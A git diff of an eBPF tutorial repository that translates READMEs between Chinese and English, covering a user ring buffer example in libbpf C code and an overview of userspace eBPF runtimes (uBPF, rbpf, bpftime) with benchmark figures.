+In this article, we showed how to use eBPF's user ring buffer and kernel ring buffer to transfer data between user mode and kernel mode. In this way, we can efficiently deliver user data to the kernel, or feed kernel-generated data back to the user, implementing two-way communication between kernel mode and user mode.

-如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。
+To learn more about eBPF and its practical uses, you can visit our tutorial code repository at or our website at for more examples and the complete tutorial.

-参考资料:
+References:

1. [https://lwn.net/Articles/907056/](https://lwn.net/Articles/907056/)

-> 原文地址: 转载请注明出处。
+> Original URL: Please indicate the source when reprinting.
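One detail worth noting about the example: the drain callback (`do_nothing_cb` in the full source) never touches the payload of the drained records. A callback that does read the user-supplied bytes could look like the following minimal sketch, using the `bpf_dynptr_read` helper; the `struct user_sample` layout shown in the comment is an assumption inferred from how `write_samples` fills the entry, not the exact definition in `user_ringbuf.h`:

```c
/* Sketch of a drain callback that copies the user-supplied record out of
 * the dynptr instead of discarding it. Assumes something like:
 *   struct user_sample { int i; char comm[16]; };
 * matching the fields the userspace writer sets above. */
static long read_sample_cb(struct bpf_dynptr *dynptr, void *context)
{
    struct user_sample sample;

    /* Copy sizeof(sample) bytes from offset 0 of the drained record;
     * a negative return means the record is smaller than requested. */
    if (bpf_dynptr_read(&sample, sizeof(sample), dynptr, 0, 0) < 0)
        return 0; /* skip a malformed record, keep draining */

    bpf_printk("user sample: i=%d comm=%s", sample.i, sample.comm);
    return 0; /* returning 0 continues draining further records */
}
```

Passing `read_sample_cb` instead of `do_nothing_cb` to `bpf_user_ringbuf_drain` would log every sample to the kernel trace pipe while leaving the rest of the program unchanged.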
diff --git a/src/35-user-ringbuf/README.zh.md b/src/35-user-ringbuf/README.zh.md new file mode 100644 index 0000000..85affed --- /dev/null +++ b/src/35-user-ringbuf/README.zh.md @@ -0,0 +1,223 @@ +# eBPF开发实践:使用 user ring buffer 向内核异步发送信息 + +eBPF,即扩展的Berkeley包过滤器(Extended Berkeley Packet Filter),是Linux内核中的一种革命性技术,它允许开发者在内核态中运行自定义的“微程序”,从而在不修改内核代码的情况下改变系统行为或收集系统细粒度的性能数据。 + +eBPF的一个独特之处是它不仅可以在内核态运行程序,从而访问系统底层的状态和资源,同时也可以通过特殊的数据结构与用户态程序进行通信。关于这方面的一个重要概念就是内核态和用户态之间的环形队列——ring buffer。在许多实时或高性能要求的应用中,环形队列是一种常用的数据结构。由于它的FIFO(先进先出)特性,使得数据在生产者和消费者之间可以持续、线性地流动,从而避免了频繁的IO操作和不必要的内存 reallocation开销。 + +在eBPF中,分别提供了两种环形队列: user ring buffer 和 kernel ring buffer,以实现用户态和内核态之间的高效数据通信。本文是 eBPF 开发者教程的一部分,更详细的内容可以在这里找到: 源代码在 [GitHub 仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial) 中开源。 + +## 用户态和内核态环形队列—user ring buffer和kernel ring buffer + +围绕内核态和用户态这两个主要运行级别,eBPF提供了两种相应的环形队列数据结构:用户态环形队列——User ring buffer和内核态环形队列——Kernel ring buffer。 + +Kernel ring buffer 则由 eBPF实现,专为Linux内核设计,用于追踪和记录内核日志、性能统计信息等,它的能力是内核态和用户态数据传输的核心,可以从内核态向用户态传送数据。Kernel ring buffer 在 5.7 版本的内核中被引入,目前已经被广泛应用于内核日志系统、性能分析工具等。 + +对于内核态往用户态发送应用场景,如内核监控事件的发送、异步通知、状态更新通知等,ring buffer 数据结构都能够胜任。比如,当我们需要监听网络服务程序的大量端口状态时,这些端口的开启、关闭、错误等状态更新就需由内核实时传递到用户空间进行处理。而Linux 内核的日志系统、性能分析工具等,也需要频繁地将大量数据发送到用户空间,以支持用户人性化地展示和分析这些数据。在这些场景中,ring buffer在内核态往用户态发送数据中表现出了极高的效率。 + +User ring buffer 是基于环形缓冲器的一种新型 Map 类型,它提供了单用户空间生产者/单内核消费者的语义。这种环形队列的优点是对异步消息传递提供了优秀的支持,避免了不必要的同步操作,使得内核到用户空间的数据传输可以被优化,并且降低了系统调用的系统开销。User ring buffer 在 6.1 版本的内核中被引入,目前的使用场景相对较少。 + +bpftime 是一个用户空间 eBPF 运行时,允许现有 eBPF 应用程序在非特权用户空间使用相同的库和工具链运行。它为 eBPF 提供了 Uprobe 和 Syscall 跟踪点,与内核 Uprobe 相比,性能有了显著提高,而且无需手动检测代码或重启进程。运行时支持用户空间共享内存中的进程间 eBPF 映射,也兼容内核 eBPF 映射,允许与内核 eBPF 基础架构无缝运行。它包括一个适用于各种架构的高性能 LLVM JIT,以及一个适用于 x86 的轻量级 JIT 和一个解释器。GitHub 地址: + +在 bpftime 中,我们使用 user ring buffer 来实现用户态 eBPF 往内核态 eBPF 发送数据,并更新内核态 eBPF 对应的 maps,让内核态和用户态的 eBPF 一起协同工作。user ring buffer 的异步特性,可以避免系统调用不必要的同步操作,从而提高了内核态和用户态之间的数据传输效率。 + +eBPF 的双向环形队列也和 io_uring 在某些方面有相似之处,但它们的设计初衷和应用场景有所不同: + +- **设计焦点**:io_uring主要专注于提高异步I/O操作的性能和效率,而eBPF的环形队列更多关注于内核和用户空间之间的数据通信和事件传输。 +- **应用范围**:io_uring主要用于文件I/O和网络I/O的场景,而eBPF的环形队列则更广泛,不限于I/O操作,还包括系统调用跟踪、网络数据包处理等。 +- **灵活性和扩展性**:eBPF提供了更高的灵活性和扩展性,允许用户定义复杂的数据处理逻辑,并在内核态执行。 + +下面,我们将通过一段代码示例,详细展示如何利用 user ring buffer,实现从用户态向内核传送数据,并以 kernel ring buffer 相应地从内核态向用户态传送数据。 + +## 一、实现:在用户态和内核态间使用 ring buffer 传送数据 + +借助新的 BPF MAP,我们可以实现在用户态和内核态间通过环形缓冲区传送数据。在这个示例中,我们将详细说明如何在用户空间创建一个 "用户环形缓冲区" (user ring buffer) 并向其写入数据,然后在内核空间中通过 `bpf_user_ringbuf_drain` 函数来消费这些数据。同时,我们也会使用 "内核环形缓冲区" (kernel ring buffer) 来从内核空间反馈数据到用户空间。为此,我们需要在用户空间和内核空间分别创建并操作这两个环形缓冲区。 + +完整的代码可以在 中找到。 + +### 创建环形缓冲区 + +在内核空间,我们创建了一个类型为 `BPF_MAP_TYPE_USER_RINGBUF` 的 `user_ringbuf`,以及一个类型为 `BPF_MAP_TYPE_RINGBUF` 的 `kernel_ringbuf`。在用户空间,我们创建了一个 `struct ring_buffer_user` 结构体的实例,并通过 `ring_buffer_user__new` 函数和对应的操作来管理这个用户环形缓冲区。 + +```c + /* Set up ring buffer polling */ + rb = ring_buffer__new(bpf_map__fd(skel->maps.kernel_ringbuf), handle_event, NULL, NULL); + if (!rb) + { + err = -1; + fprintf(stderr, "Failed to create ring buffer\n"); + goto cleanup; + } + user_ringbuf = user_ring_buffer__new(bpf_map__fd(skel->maps.user_ringbuf), NULL); +``` + +### 编写内核态程序 + +我们定义一个 `kill_exit` 的 tracepoint 程序,每当有进程退出时,它会通过 `bpf_user_ringbuf_drain` 函数读取 `user_ringbuf` 中的用户数据,然后通过 `bpf_ringbuf_reserve` 函数在 `kernel_ringbuf` 中创建一个新的记录,并写入相关信息。最后,通过 `bpf_ringbuf_submit` 函数将这个记录提交,使得该记录能够被用户空间读取。 + +```c +// SPDX-License-Identifier: GPL-2.0 +/* Copyright (c) 2022 Meta Platforms, Inc. and affiliates. 
*/
+
+#include "vmlinux.h"
+#include <bpf/bpf_helpers.h>
+#include <bpf/bpf_tracing.h>
+#include <bpf/bpf_core_read.h>
+#include "user_ringbuf.h"
+
+char _license[] SEC("license") = "GPL";
+
+struct
+{
+    __uint(type, BPF_MAP_TYPE_USER_RINGBUF);
+    __uint(max_entries, 256 * 1024);
+} user_ringbuf SEC(".maps");
+
+struct
+{
+    __uint(type, BPF_MAP_TYPE_RINGBUF);
+    __uint(max_entries, 256 * 1024);
+} kernel_ringbuf SEC(".maps");
+
+int read = 0;
+
+static long
+do_nothing_cb(struct bpf_dynptr *dynptr, void *context)
+{
+    struct event *e;
+    pid_t pid;
+    /* get PID and TID of exiting thread/process */
+    pid = bpf_get_current_pid_tgid() >> 32;
+
+    /* reserve sample from BPF ringbuf */
+    e = bpf_ringbuf_reserve(&kernel_ringbuf, sizeof(*e), 0);
+    if (!e)
+        return 0;
+
+    e->pid = pid;
+    bpf_get_current_comm(&e->comm, sizeof(e->comm));
+
+    /* send data to user-space for post-processing */
+    bpf_ringbuf_submit(e, 0);
+    __sync_fetch_and_add(&read, 1);
+    return 0;
+}
+
+SEC("tracepoint/syscalls/sys_exit_kill")
+int kill_exit(struct trace_event_raw_sys_exit *ctx)
+{
+    long num_samples;
+    int err = 0;
+
+    // receive data from userspace
+    num_samples = bpf_user_ringbuf_drain(&user_ringbuf, do_nothing_cb, NULL, 0);
+
+    return 0;
+}
+```
+
+### 编写用户态程序
+
+在用户空间,我们通过 `user_ring_buffer__reserve` 函数在 ring buffer 中预留出一段空间,这段空间用于写入我们希望传递给内核的信息。然后,通过 `user_ring_buffer__submit` 函数提交数据,之后这些数据就可以在内核态被读取。
+
+```c
+static int write_samples(struct user_ring_buffer *ringbuf)
+{
+    int i = 0, err = 0; /* i 为样本编号;本例只写入一个样本 */
+    struct user_sample *entry;
+
+    entry = user_ring_buffer__reserve(ringbuf, sizeof(*entry));
+    if (!entry)
+    {
+        err = -errno;
+        goto done;
+    }
+
+    entry->i = getpid();
+    strcpy(entry->comm, "hello");
+
+    int read = snprintf(entry->comm, sizeof(entry->comm), "%u", i);
+    if (read <= 0)
+    {
+        /* Assert on the error path to avoid spamming logs with
+         * mostly success messages.
+         */
+        err = read;
+        user_ring_buffer__discard(ringbuf, entry);
+        goto done;
+    }
+
+    user_ring_buffer__submit(ringbuf, entry);
+
+done:
+    drain_current_samples();
+
+    return err;
+}
+```
+
+### 初始化环形缓冲区并轮询
+
+最后,对 ring buffer 进行初始化并定时轮询,这样我们就可以实时得知内核态的数据消费情况;我们还可以在用户空间对 `user_ringbuf` 进行写入操作,然后在内核态对其进行读取和处理。
+
+```c
+    write_samples(user_ringbuf);
+
+    /* Process events */
+    printf("%-8s %-5s %-16s %-7s %-7s %s\n",
+           "TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE");
+    while (!exiting)
+    {
+        err = ring_buffer__poll(rb, 100 /* timeout, ms */);
+        /* Ctrl-C will cause -EINTR */
+        if (err == -EINTR)
+        {
+            err = 0;
+            break;
+        }
+        if (err < 0)
+        {
+            printf("Error polling ring buffer: %d\n", err);
+            break;
+        }
+    }
+```
+
+通过以上步骤,我们实现了用户态与内核态间环形缓冲区的双向数据传输。
+
+## 二、编译和运行代码
+
+为了编译和运行以上代码,我们可以通过以下命令来实现:
+
+```sh
+make
+```
+
+关于如何安装依赖,请参考:
+
+运行结果将展示如何使用 user ring buffer 和 kernel ringbuffer 在用户态和内核态间进行高效的数据传输:
+
+```console
+$ sudo ./user_ringbuf
+Draining current samples...
+TIME EVENT COMM PID
+16:31:37 SIGN node 1707
+Draining current samples...
+16:31:38 SIGN node 1981
+Draining current samples...
+16:31:38 SIGN node 1707
+Draining current samples...
+16:31:38 SIGN node 1707
+Draining current samples...
+```
+
+## 总结
+
+在本篇文章中,我们介绍了如何使用eBPF的user ring buffer和kernel ring buffer在用户态和内核态之间进行数据传输。通过这种方式,我们可以有效地将用户态的数据传送给内核,或者将内核生成的数据反馈给用户,从而实现了内核态和用户态的双向通信。
+
+如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。
+
+参考资料:
+
+1. 
[https://lwn.net/Articles/907056/](https://lwn.net/Articles/907056/) + +> 原文地址: 转载请注明出处。 diff --git a/src/35-user-ringbuf/README_en.md b/src/35-user-ringbuf/README_en.md deleted file mode 100644 index 769f6b7..0000000 --- a/src/35-user-ringbuf/README_en.md +++ /dev/null @@ -1,223 +0,0 @@ -# eBPF Development Practices: Asynchronously Send to Kernel with User Ring Buffer - -eBPF, or Extended Berkeley Packet Filter, is a revolutionary technology in the Linux kernel that allows developers to run custom "micro programs" in kernel mode, thereby changing system behavior or collecting fine-grained performance data without modifying kernel code. - -One unique aspect of eBPF is that it not only allows programs to run in kernel mode to access low-level system states and resources, but it can also communicate with user mode programs through special data structures. One important concept in this regard is the ring buffer between kernel mode and user mode. In many real-time or high-performance applications, the ring buffer is a commonly used data structure. Due to its FIFO (first in, first out) characteristics, data can flow continuously and linearly between the producer and the consumer, avoiding frequent IO operations and unnecessary memory reallocation overhead. - -In eBPF, two types of ring buffers are provided: user ring buffer and kernel ring buffer, to achieve efficient data communication between user mode and kernel mode. This article is part of the eBPF developer tutorial. More detailed content can be found here: The source code is open source in the . - -## User mode and kernel mode ring buffers—user ring buffer and kernel ring buffer - -Around the two main run levels of kernel mode and user mode, eBPF provides two corresponding ring buffer data structures: User ring buffer and Kernel ring buffer. - -Kernel ring buffer is implemented by eBPF and is specially designed for the Linux kernel to track and record kernel logs, performance statistics, etc. It is the core of data transfer from kernel mode to user mode and can send data from kernel mode to user mode. Kernel ring buffer was introduced in the 5.7 version of the kernel and is now widely used in the kernel logging system, performance analysis tools, etc. - -For scenarios where the kernel sends to user mode, such as sending kernel monitoring events, asynchronous notifications, status update notifications, etc., the ring buffer data structure can handle them. For example, when we need to monitor the status of a large number of ports of network service programs, the opening, closing, errors, and other status updates of these ports need to be real-time transferred to the user space for processing. Linux kernel's logging system, performance analysis tools, etc., also need to frequently send large amounts of data to user space to support user-friendly display and analysis of these data. In these scenarios, the ring buffer shows extremely high efficiency in sending data from the kernel to the user. - -User ring buffer is a new type of Map type based on the ring buffer, it provides the semantics of a single user space producer/single kernel consumer. The advantage of this ring buffer is that it provides excellent support for asynchronous message passing, avoiding unnecessary synchronization operations, optimizing data transfer from the kernel to user space, and reducing the system overhead of system calls. User ring buffer was introduced in the 6.1 version of the kernel and its current use cases are relatively limited. 
- -bpftime is a user space eBPF runtime that allows existing eBPF applications to run in unprivileged user space using the same libraries and toolchain. It provides Uprobe and Syscall tracing points for eBPF, which significantly improves performance compared to kernel Uprobe and does not require manual code detection or process restart. The runtime supports process eBPF mapping in user space shared memory, and is also compatible with kernel eBPF mapping, allowing seamless operation with the kernel eBPF infrastructure. It includes a high-performance LLVM JIT for various architectures, a lightweight JIT for x86, and an interpreter. GitHub address: - -In bpftime, we use the user ring buffer to implement data transmission from user mode eBPF to kernel mode eBPF, and update the maps corresponding to kernel mode eBPF, so that kernel mode and user mode eBPF can work together. The asynchronous characteristics of user ring buffer can avoid unnecessary synchronization operations of system calls, thereby improving the efficiency of data transmission between kernel mode and user mode. - -The bi-directional ring buffer of eBPF also has similarities to io_uring in some respects, but their design intentions and use cases are different: - -- **Design focus**: io_uring primarily focuses on improving the performance and efficiency of asynchronous I/O operations, while eBPF's ring buffer focuses more on data communication and event transmission between the kernel and user space. -- **Application range**: io_uring is mainly used in file I/O and network I/O scenarios, while eBPF's ring buffer is more widespread, not limited to I/O operations, but also including system call tracing, network packet processing, etc. -- **Flexibility and extensibility**: eBPF provides higher flexibility and extensibility, allowing users to define complex data processing logic and execute it in kernel mode. - -Following is a code example where we will show in detail how to use user ring buffer to transmit data from user mode to the kernel, and how to respond accordingly with kernel ring buffer to transmit data from kernel mode to user mode. - -## I. Implementation: Using Ring Buffer to Transfer Data Between User Mode and Kernel Mode - -With the help of the new BPF MAP, we can implement the transfer of data between user mode and kernel mode through the ring buffer. In this example, we will detail how to create a "user ring buffer" in user space and write data to it and then consume this data in kernel space with the `bpf_user_ringbuf_drain` function. At the same time, we will use the "kernel ring buffer" to feed back data from kernel space to user space. To do this, we need to create and operate these two ring buffers separately in user space and kernel space. - -The complete code can be found at . - -### Create Ring Buffer - -In kernel mode, we created a `user_ringbuf` of type `BPF_MAP_TYPE_USER_RINGBUF` and a `kernel_ringbuf` of type `BPF_MAP_TYPE_RINGBUF`. In user mode, we created an instance of the `struct ring_buffer_user` structure and managed this user ring buffer through the `ring_buffer_user__new` function and corresponding operations. 
- -```c - /* Set up ring buffer polling */ - rb = ring_buffer__new(bpf_map__fd(skel->maps.kernel_ringbuf), handle_event, NULL, NULL); - if (!rb) - { - err = -1; - fprintf(stderr, "Failed to create ring buffer\n"); - goto cleanup; - } - user_ringbuf = user_ring_buffer__new(bpf_map__fd(skel->maps.user_ringbuf), NULL); -``` - -### Writing Kernel Mode Programs - -We define a `kill_exit` tracepoint program that will read user data from `user_ringbuf` with the `bpf_user_ringbuf_drain` function whenever a process exits. Then, it creates a new record in `kernel_ringbuf` with the `bpf_ringbuf_reserve` function and writes relevant information. Finally, the record is submitted with the `bpf_ringbuf_submit` function so that it can be read by user mode. - -```c -// SPDX-License-Identifier: GPL-2.0 -/* Copyright (c) 2022 Meta Platforms, Inc. and affiliates. */ - -#include "vmlinux.h" -#include -#include -#include -#include "user_ringbuf.h" - -char _license[] SEC("license") = "GPL"; - -struct -{ - __uint(type, BPF_MAP_TYPE_USER_RINGBUF); - __uint(max_entries, 256 * 1024); -} user_ringbuf SEC(".maps"); - -struct -{ - __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 256 * 1024); -} kernel_ringbuf SEC(".maps"); - -int read = 0; - -static long -do_nothing_cb(struct bpf_dynptr *dynptr, void *context) -{ - struct event *e; - pid_t pid; - /* get PID and TID of exiting thread/process */ - pid = bpf_get_current_pid_tgid() >> 32; - - /* reserve sample from BPF ringbuf */ - e = bpf_ringbuf_reserve(&kernel_ringbuf, sizeof(*e), 0); - if (!e) - return 0; - - e->pid = pid; - bpf_get_current_comm(&e->comm, sizeof(e->comm)); - - /* send data to user-space for post-processing */ - bpf_ringbuf_submit(e, 0); - __sync_fetch_and_add(&read, 1); - return 0; -} - -SEC("tracepoint/syscalls/sys_exit_kill") -int kill_exit(struct trace_event_raw_sys_exit *ctx) -{ - long num_samples; - int err = 0; - - // receive data from userspace - num_samples = bpf_user_ringbuf_drain(&user_ringbuf, do_nothing_cb, NULL, 0); - - return 0; -} -``` - -### Writing User Mode Programs - -In user mode, we reserved a section of space in the ring buffer with the `ring_buffer_user__reserve` function. This space is used to write the information we want to pass to the kernel. Then, the data is submitted using the `ring_buffer_user__submit` function, after which this data can be read and processed in kernel mode. - -```c -static int write_samples(struct user_ring_buffer *ringbuf) -{ - int i, err = 0; - struct user_sample *entry; - - entry = user_ring_buffer__reserve(ringbuf, sizeof(*entry)); - if (!entry) - { - err = -errno; - goto done; - } - - entry->i = getpid(); - strcpy(entry->comm, "hello"); - - int read = snprintf(entry->comm, sizeof(entry->comm), "%u", i); - if (read <= 0) - { - /* Assert on the error path to avoid spamming logs with - * mostly success messages. - */ - err = read; - user_ring_buffer__discard(ringbuf, entry); - goto done; - } - - user_ring_buffer__submit(ringbuf, entry); - -done: - drain_current_samples(); - - return err; -} -``` - -### Initialization of the Ring Buffer and Poll - -Finally, initialize the ring buffer and periodically poll, so we can know in real-time the consumption of data in kernel mode. We can also write to the `user_ringbuf` in user mode, then read and process it in kernel mode. 
- -```c - write_samples(user_ringbuf); - - /* Process events */ - printf("%-8s %-5s %-16s %-7s %-7s %s\n", - "TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE"); - while (!exiting) - { - err = ring_buffer__poll(rb, 100 /* timeout, ms */); - /* Ctrl-C will cause -EINTR */ - if (err == -EINTR) - { - err = 0; - break; - } - if (err < 0) - { - printf("Error polling perf buffer: %d\n", err); - break; - } - } -``` - -Through the above steps, we have implemented two-way data transmission between user mode and kernel mode. - -## II. Compile and Run the Code - -To compile and run the above code, we can run the following command: - -```sh -make -``` - -For information on how to install dependencies, refer to: - -The execution result displays how to use the user ring buffer and kernel ringbuffer for efficient data transmission between user mode and kernel mode: - -```console -$ sudo ./user_ringbuf -Draining current samples... -TIME EVENT COMM PID -16:31:37 SIGN node 1707 -Draining current samples... -16:31:38 SIGN node 1981 -Draining current samples... -16:31:38 SIGN node 1707 -Draining current samples... -16:31:38 SIGN node 1707 -Draining current samples... -``` - -## Conclusion - -In this article, we discussed how to use eBPF's user ring buffer and kernel ring buffer for data transmission between user mode and kernel mode. Through this method, we can effectively deliver user data to the kernel or feed back kernel-generated data to the user, thus implementing two-way communication between the kernel and user modes. - -If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or our website at for more examples and complete tutorials. - -References: - -1. [https://lwn.net/Articles/907056/](https://lwn.net/Articles/907056/) - -> Original URL: Please indicate the source when reprinting. diff --git a/src/36-userspace-ebpf/README.md b/src/36-userspace-ebpf/README.md index be83019..1d5203a 100644 --- a/src/36-userspace-ebpf/README.md +++ b/src/36-userspace-ebpf/README.md @@ -1,151 +1,148 @@ -# 用户空间 eBPF 运行时:深度解析与应用实践 +# Userspace eBPF Runtimes: Overview and Applications -郑昱笙 +Yusheng Zheng -本文旨在对用户空间的 eBPF 运行时和对应的一些应用场景进行剖析和总结。尽管大多数人对基于内核的 eBPF 已有所了解,用户空间 eBPF 的进展和应用实践同样引人注目。本文还将探讨用户空间 eBPF 运行时与 Wasm 运行时的技术比较,后者在云原生和边缘计算领域已获得广泛的关注。我们也新开源了一个用户态 eBPF 运行时 [bpftime](https://github.com/eunomia-bpf/bpftime)。通过 LLVM `JIT/AOT` 后端支持,我们的基准测试表明 bpftime 是最快的用户空间 eBPF 运行时之一,同时还可以让内核中间的 eBPF Uprobe 无缝在用户空间运行,获得近十倍的性能提升。 +In this blog post, we'll dive into the world of eBPF in userspace. While many are familiar with kernel-based eBPF, userspace eBPF runtimes have been making significant strides and offer compelling use cases. We will also compare userspace eBPF runtimes with Wasm runtimes, another popular technology in the cloud-native and edge computing landscape. Among these, we're excited to introduce [bpftime](https://github.com/eunomia-bpf/bpftime). Powered by an LLVM `JIT/AOT` backend, our benchmarks suggest that bpftime stands out as one of the fastest userspace eBPF runtimes available. -## eBPF:内核的动态扩展运行时与字节码 +## Introduction to eBPF -### eBPF 究竟是何方神圣? +### What is eBPF? -eBPF,全称 "extended Berkeley Packet Filter",是一项允许在不更改内核源代码或重启系统的情况下动态干预和修改内核行为的革命性技术。虽然 eBPF 起初是作为网络数据包过滤工具而设计,但如今已广泛应用于从性能分析到安全策略等多个方面,逐渐成为系统管理员的得力助手。 +eBPF, which stands for "extended Berkeley Packet Filter," is a revolutionary technology that facilitates the dynamic tracing and monitoring of kernel operations without modifying kernel source code or rebooting the system. 
Originally designed for network packet filtering, eBPF has evolved to support a wide range of applications, from performance analysis to security, making it a versatile tool in a system administrator's arsenal. -eBPF 的前身,Berkeley Packet Filter (BPF) —— 20 世纪 90 年代初的产物,主要用于网络数据包的高效过滤。尽管 BPF 已被广大用户所认可,eBPF 的出现则为其带来了更为广泛的指令集,并能直接与内核数据结构互动。自 2014 年 Linux 内核引入 eBPF 以后,它的影响力迅速扩张。Linux 的核心开发团队不断地完善 eBPF,使其从一个基础的网络数据包过滤器逐渐演变为一个功能强大的字节码引擎。 +The story of eBPF begins with the Berkeley Packet Filter (BPF), introduced in the early 1990s as a way to filter and capture network packets efficiently. Over the years, BPF proved to be an invaluable asset, but there was room for improvement. eBPF emerged as an advanced iteration of BPF, equipped with a richer instruction set and the capability to interact with kernel data structures directly. -### eBPF 对现代计算和网络的深远影响 +The Linux kernel adopted eBPF around 2014, and since then, its popularity and adoption have skyrocketed. Key contributors to the Linux kernel worked diligently to evolve eBPF from a simple packet filter to a generic and powerful bytecode engine. -随着现代计算环境日益复杂,实时数据的采集和深入分析显得尤为重要。在这一背景下,eBPF 凭借其卓越的动态性,为开发者和管理员提供了实时干预系统行为的强大工具。eBPF 以其卓越的灵活性在现代网络解决方案中占据核心地位。它为流量控制、负载均衡及安全策略在内核级别提供了细致的控制手段,确保了系统的性能优化和安全稳定。同时,eBPF 在系统可观察性上也做出了显著贡献,为各种系统调用和硬件事件提供了详细的可编程追踪方案,促进了问题的迅速定位和解决。 +### Its significance in modern computing and network solutions -## 用户空间 eBPF 运行时:eBPF 的新生代 +In today's complex computing environments, the need for real-time data and insights is paramount. eBPF shines in this regard, allowing developers and administrators to introspect and modify system behaviors on the fly. -### 什么是用户空间 eBPF 运行时? +Given its dynamic nature, eBPF has become a cornerstone of modern networking solutions. It enables fine-grained traffic control, load balancing, and security enforcement at the kernel level, ensuring optimal performance and security. Furthermore, in the realm of observability, eBPF provides granular insights into system calls, hardware events, and more, facilitating proactive problem detection and resolution. -虽然 eBPF 最初是为内核设计的,但它在用户空间的巨大潜力,以及内核对于 `GPL LICENSE` 的限制,也催生了用户空间 eBPF 运行时的产生。这些运行时允许开发者在内核之外利用 eBPF 的能力,提供了一个在内核之外的运行平台,扩展其实用性和适用性,同时不受限于 GPL LICENSE。虽然 eBPF 的一个突出特点是其在内核空间内执行代码的能力,提供快速的可观察性和数据聚合,但在某些情境下,拥有一个用户空间的替代方案变得非常有价值。这些用户空间运行时扩展了 eBPF 多功能性的范围,超越了内核集成,并常常作为特定用例的实验场地、调试工具或框架。 +### eBPF: from kernel runtime to userspace runtime -### 特定运行时简介 +While the initial design of eBPF was deeply embedded within the kernel, the demand for similar functionality in userspace applications led to the evolution of userspace eBPF runtimes. These runtimes allow developers to leverage eBPF's capabilities outside the kernel, expanding its utility and applicability. Userspace eBPF runtimes make it feasible to apply eBPF's prowess to a broader set of applications, from custom network protocols to novel security solutions, further cementing eBPF's role as a transformative technology in the computing landscape. + +## Userspace eBPF Runtimes and Their Role + +### What is a userspace eBPF runtime? + +A userspace eBPF runtime provides a platform outside of the kernel to run eBPF programs. While one of eBPF's standout attributes is its capability to execute code within the kernel space, offering rapid observability and data aggregation, there are scenarios where having a userspace alternative becomes valuable. 
These userspace runtimes extend the reach of eBPF's versatility to areas beyond kernel integrations and often serve as experimental grounds, debugging tools, or frameworks for specific use cases.
+
+### Introduction to specific runtimes

#### **ubpf**

-[uBPF](https://github.com/iovisor/ubpf) 是将 eBPF 引入用户空间的早期尝试之一。主要作为一个概念证明,它作为 eBPF 解释器的用户空间解释与 x86_64 和 arm64 JIT 的结合。尽管其起源是一个早期原型,uBPF 吸引了注意并被用作高性能网络项目(如 DPDK 和 Oko)的基础。它的非 GPL 许可证(Apache)使其适用于各种项目,包括非开源项目。然而,最近,uBPF 正在迎头赶上内核发展,特别是微软为其 eBPF Windows 实现做出的贡献。但是,开发 ubpf 和 rbpf 程序可能需要一个特定的工具链,这对于一些用户可能是一个障碍。ubpf 只有一个有限的哈希 maps 实现,对大多数场景而言可能不够。另外,ubpf 本身只是一个虚拟机/解释器,在实际的使用中,依然需要编写胶水代码,和其他用户空间程序进行编译、链接后才能使用。
+[uBPF](https://github.com/iovisor/ubpf) was among the early attempts to bring eBPF to userspace. Conceived primarily as a proof of concept, it combines a user-space eBPF interpreter with x86_64 and arm64 JITs. Despite its origins as an early prototype, uBPF garnered attention and was used as a foundation for high-performance networking projects such as DPDK and Oko. Its non-GPL license (Apache) makes it favorable for a wide range of projects, including proprietary ones. More recently, uBPF has been catching up with kernel developments, particularly through Microsoft's contributions for its eBPF for Windows implementation. However, developing ubpf and rbpf programs may require a specific toolchain, which can be a barrier for some users, and uBPF ships only a limited hash map implementation, which may not be enough for many scenarios. Moreover, uBPF itself is just a virtual machine/interpreter: in practice, you still need to write glue code and compile and link it with the rest of your userspace program before it can be used.

#### **rbpf**

-[rbpf](https://github.com/qmonnet/rbpf) 和 uBPF 非常相似,但重点是使用了 Rust 进行开发,这是一种因其内存安全保证而著称的语言。创建 rbpf 是由于想要探索 eBPF 和 Rust 的交集。虽然没有广泛采纳,但 rbpf 的知名用户包括 Solana 团队,他们使用它为带有 eBPF 驱动的智能合约的区块链工具。rbpf 的一个优势在于其许可证 (MIT),允许在各种项目中广泛重用。rbpf 也缺乏 eBPF Maps 支持,并且仅为 x86_64 提供 JIT 支持。同样,rbpf 也需要编译和手动嵌入对应的应用程序中才可以使用。
+[rbpf](https://github.com/qmonnet/rbpf) is heavily influenced by uBPF but with an emphasis on Rust, a language renowned for its memory-safety guarantees. The creation of rbpf was driven by a desire to explore the intersection of eBPF and Rust. While not as widespread in adoption, notable users of rbpf include the Solana team, who employ it in blockchain tooling for eBPF-driven smart contracts. One of rbpf's advantages lies in its licensing (MIT), allowing for broad reuse across various projects. On the downside, rbpf lacks eBPF map support and only provides JIT support for x86_64; like uBPF, it must be compiled into and manually embedded in the corresponding application before it can be used.

#### **bpftime**

-基于 LLVM JIT/AOT 构建的 [bpftime](https://github.com/eunomia-bpf/bpftime) 是专为用户空间操作设计的一个高性能 eBPF 运行时。它以其快速的 Uprobe 能力和 Syscall 钩子脱颖而出,尤其是 Uprobe 性能比内核提高了十倍。此外,bpftime 提供编程 syscall 钩子、共享内存映射和与熟悉的工具链(如 libbpf 和 clang)的兼容性。其设计解决了一些内核 eBPF 的限制,并在某些方面超越了像 Wasm 运行时这样的插件系统。这是使用 Userspace bpftime 的 eBPF 进行 Hook 的一些性能数据,将用户空间和内核空间进行对比:
+Built atop LLVM JIT/AOT, [bpftime](https://github.com/eunomia-bpf/bpftime) is a cutting-edge, high-performance eBPF runtime designed exclusively for userspace operations. It stands out with its rapid Uprobe capabilities and syscall hooks, notably outperforming kernel Uprobes by a tenfold margin. Additionally, bpftime offers programmatic syscall hooking, shared-memory maps, and compatibility with familiar toolchains like libbpf and clang. Its design addresses some kernel eBPF limitations and outpaces plugin systems like the Wasm runtime in certain aspects. Here are some performance numbers for hooking with eBPF on userspace bpftime, comparing userspace against kernel space:
+
+| Probe/Tracepoint Types | Kernel (ns) | Userspace (ns) | Insn Count |
+|------------------------|-------------:|---------------:|---------------:|
+| Uprobe | 3224.172760 | 314.569110 | 4 |
+| Uretprobe | 3996.799580 | 381.270270 | 2 |
+| Syscall Tracepoint | 151.82801 | 232.57691 | 4 |
+| Embedding runtime | Not available | 110.008430 | 4 |
+
